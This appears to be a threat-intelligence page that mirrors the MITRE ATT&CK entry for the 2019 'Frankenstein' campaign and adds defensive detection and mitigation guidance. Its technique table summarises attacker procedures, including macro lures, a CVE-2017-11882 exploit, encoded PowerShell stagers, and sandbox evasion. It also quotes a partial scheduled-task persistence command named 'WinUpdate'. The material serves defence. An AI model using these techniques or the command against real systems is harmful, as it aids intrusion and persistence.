C0001: Frankenstein
Frankenstein was described by security researchers as a highly-targeted campaign conducted by moderately sophisticated and highly resourceful threat actors in early 2019. The unidentified actors primarily relied on open source tools, including Empire. The campaign name refers to the actors' ability to piece together several unrelated open-source tool components.[1]
Analyst context for executives and security teams
Frankenstein matters because it shows how a targeted campaign can be built from publicly available components rather than custom malware. For leaders, the practical issue is not the campaign name itself; it is whether the organization can detect and respond when legitimate administration features, scripting languages, open-source post-exploitation tooling, discovery commands, scheduled tasks, obfuscation, and web-based command-and-control are combined into one intrusion path.
Executive priority
Prioritize this as a control-validation and incident-readiness use case. ATT&CK does not identify the actors or provide campaign-specific detection logic, but the mapped behaviors touch common business-risk areas: user-driven execution, client-side exploitation, PowerShell/cmd/WMI/MSBuild abuse, persistence through scheduled tasks, internal discovery, local data collection, and exfiltration over C2/web channels. Executives should ask whether SOC, endpoint, network, and IR teams can correlate these behaviors across the kill chain rather than relying on single-tool signatures for a named campaign.
Technical view
Validate coverage against the related behaviors rather than the campaign label. Key checks include PowerShell and Windows command shell execution, WMI activity, MSBuild proxy execution, scheduled task creation or modification, masqueraded task/service names, command obfuscation and decoding activity, system/user/network/process discovery, local and automated collection, tool transfer, web protocol C2, and exfiltration over an existing C2 channel. Empire is the only related software identified and is described as a cross-platform, open-source remote administration and post-exploitation framework with PowerShell agents for Windows and Python agents for Linux/macOS.
Likely telemetry
- Endpoint process creation and command-line telemetry, especially PowerShell, cmd, WMI, MSBuild, and script interpreters
- PowerShell logging and script/block content where available
- Scheduled task and service creation, modification, naming, and execution records
- Endpoint file creation, archive, decode/deobfuscation, and tool-transfer evidence
- User, system, network configuration, and process discovery command activity
Detection direction
- Build detections around behavior chains: user execution or client exploitation followed by scripting, discovery, task/service persistence, collection, and outbound web communications.
- Tune for administrative false positives: PowerShell, WMI, scheduled tasks, MSBuild, and discovery commands are common in enterprise operations, so detections should use context such as unusual parent process, encoded or obfuscated command content, rare task names, unexpected execution path, or abnormal user/host baseline.
- Do not depend on tool names alone. The campaign description emphasizes open-source components and unrelated tool pieces, so coverage should focus on technique-level behavior and correlation.
- Check blind spots in script logging, command-line capture, endpoint visibility on non-Windows systems, proxy visibility for encrypted web traffic metadata, and retention needed to reconstruct collection-to-exfiltration timelines.
- Use the Empire relationship as a validation scenario for post-exploitation framework activity, but avoid assuming every matching behavior is Empire or Frankenstein without local evidence.
Mitigation priorities
- Harden and monitor scripting and administrative execution paths first: PowerShell, cmd, WMI, MSBuild, and scheduled task usage should be governed, logged, and restricted where business operations allow.
- Strengthen user-execution defenses for malicious files and document/template abuse through safe handling controls, attachment inspection, endpoint prevention, and user reporting workflows.
- Reduce post-exploitation opportunity by enforcing least privilege, limiting unnecessary administrative tooling exposure, and reviewing scheduled tasks/services for unauthorized or misleading names.
- Improve collection and exfiltration resilience with sensitive-data location awareness, egress monitoring, network segmentation, and alerting on unusual automated collection or outbound transfer behavior.
- Use purple-team or detection-engineering tests mapped to the related ATT&CK techniques to produce audit-ready evidence of telemetry, alerting, triage playbooks, and response ownership.
Analyst notes and limits
The official campaign description identifies a highly targeted early-2019 campaign by unidentified actors using open-source tools, including Empire. The relationship set provides the most useful defensive context: execution, discovery, stealth, collection, command-and-control, persistence, and exfiltration techniques. Treat this as an ATT&CK-informed validation package, not as evidence of current activity or attribution.
ATT&CK provides no official detection text, no campaign-specific platforms or tactics on the campaign object, and limited campaign detail beyond the cited Talos report and relationships. Local environment telemetry, asset criticality, normal administrative behavior, and incident evidence are required to determine exposure, coverage, and priority.
Frankenstein
Frankenstein was described by security researchers as a highly-targeted campaign conducted by moderately sophisticated and highly resourceful threat actors in early 2019. The unidentified actors primarily relied on open source tools, including Empire. The campaign name refers to the actors' ability to piece together several unrelated open-source tool components.[1]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1057 | Process Discovery | During Frankenstein, the threat actors used Empire to obtain a list of all running processes.CitationTalos Frankenstein June 2019 |
| Enterprise | T1082 | System Information Discovery | During Frankenstein, the threat actors used Empire to obtain the compromised machine's name.CitationTalos Frankenstein June 2019 |
| Enterprise | T1027.010 | Command Obfuscation Sub-technique | During Frankenstein, the threat actors ran encoded commands from the command line.CitationTalos Frankenstein June 2019 |
| Enterprise | T1020 | Automated Exfiltration | During Frankenstein, the threat actors collected information via Empire, which was automatically sent back to the adversary's C2.CitationTalos Frankenstein June 2019 |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | During Frankenstein, the threat actors established persistence through a scheduled task using the command: `/Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR`, named "WinUpdate" CitationTalos Frankenstein June 2019 |
| Enterprise | T1204.002 | Malicious File Sub-technique | During Frankenstein, the threat actors relied on a victim to enable macros within a malicious Microsoft Word document likely sent via email.CitationTalos Frankenstein June 2019 |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | During Frankenstein, the threat actors likely used spearphishing emails to send malicious Microsoft Word documents.CitationTalos Frankenstein June 2019 |
| Enterprise | T1105 | Ingress Tool Transfer | During Frankenstein, the threat actors downloaded files and tools onto a victim machine.CitationTalos Frankenstein June 2019 |
| Enterprise | T1059.001 | PowerShell Sub-technique | During Frankenstein, the threat actors used PowerShell to run a series of Base64-encoded commands that acted as a stager and enumerated hosts.CitationTalos Frankenstein June 2019 |
| Enterprise | T1518.001 | Security Software Discovery Sub-technique | During Frankenstein, the threat actors used WMI queries to determine if analysis tools were running on a compromised system.CitationTalos Frankenstein June 2019 |
| Enterprise | T1059.005 | Visual Basic Sub-technique | During Frankenstein, the threat actors used Word documents that prompted the victim to enable macros and run a Visual Basic script.CitationTalos Frankenstein June 2019 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | During Frankenstein, the threat actors used HTTP GET requests for C2.CitationTalos Frankenstein June 2019 |
| Enterprise | T1221 | Template Injection | During Frankenstein, the threat actors used trojanized documents that retrieved remote templates from an adversary-controlled website.CitationTalos Frankenstein June 2019 |
| Enterprise | T1203 | Exploitation for Client Execution | During Frankenstein, the threat actors exploited CVE-2017-11882 to execute code on the victim's machine.CitationTalos Frankenstein June 2019 |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | During Frankenstein, the threat actors ran a command script to set up persistence as a scheduled task named "WinUpdate", as well as other encoded commands from the command-line CitationTalos Frankenstein June 2019 |
| Enterprise | T1497.001 | System Checks Sub-technique | During Frankenstein, the threat actors used a script that ran WMI queries to check if a VM or sandbox was running, including VMWare and Virtualbox. The script would also call WMI to determine the number of cores allocated to the system; if less than two the script would stop execution.CitationTalos Frankenstein June 2019 |
| Enterprise | T1047 | Windows Management Instrumentation | During Frankenstein, the threat actors used WMI queries to check if various security applications were running as well as to determine the operating system version.CitationTalos Frankenstein June 2019 |
| Enterprise | T1119 | Automated Collection | During Frankenstein, the threat actors used Empire to automatically gather the username, domain name, machine name, and other system information.CitationTalos Frankenstein June 2019 |
| Enterprise | T1036.004 | Masquerade Task or Service Sub-technique | During Frankenstein, the threat actors named a malicious scheduled task "WinUpdate" for persistence.CitationTalos Frankenstein June 2019 |
| Enterprise | T1005 | Data from Local System | During Frankenstein, the threat actors used Empire to gather various local system information.CitationTalos Frankenstein June 2019 |
| Enterprise | T1041 | Exfiltration Over C2 Channel | During Frankenstein, the threat actors collected information via Empire, which sent the data back to the adversary's C2.CitationTalos Frankenstein June 2019 |
| Enterprise | T1016 | System Network Configuration Discovery | During Frankenstein, the threat actors used Empire to find the public IP address of a compromised system.CitationTalos Frankenstein June 2019 |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | During Frankenstein, the threat actors deobfuscated Base64-encoded commands following the execution of a malicious script, which revealed a small script designed to obtain an additional payload.CitationTalos Frankenstein June 2019 |
| Enterprise | T1588.002 | Tool Sub-technique | For Frankenstein, the threat actors obtained and used Empire.CitationTalos Frankenstein June 2019 |
| Enterprise | T1127.001 | MSBuild Sub-technique | During Frankenstein, the threat actors used MSbuild to execute an actor-created file.CitationTalos Frankenstein June 2019 |
| Enterprise | T1033 | System Owner/User Discovery | During Frankenstein, the threat actors used Empire to enumerate hosts and gather username, machine name, and administrative permissions information.CitationTalos Frankenstein June 2019 |
| Enterprise | T1573.001 | Symmetric Cryptography Sub-technique | During Frankenstein, the threat actors communicated with C2 via an encrypted RC4 byte stream and AES-CBC.CitationTalos Frankenstein June 2019 |
Groups, software, and campaigns
S0363: Empire
Empire is an open-source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.[1][2][3]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.1 | Current bundle | e31a4b7d3f56… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Talos Frankenstein June 2019
Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020.
Open source URL -
[2]
mitre-attack C0001Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.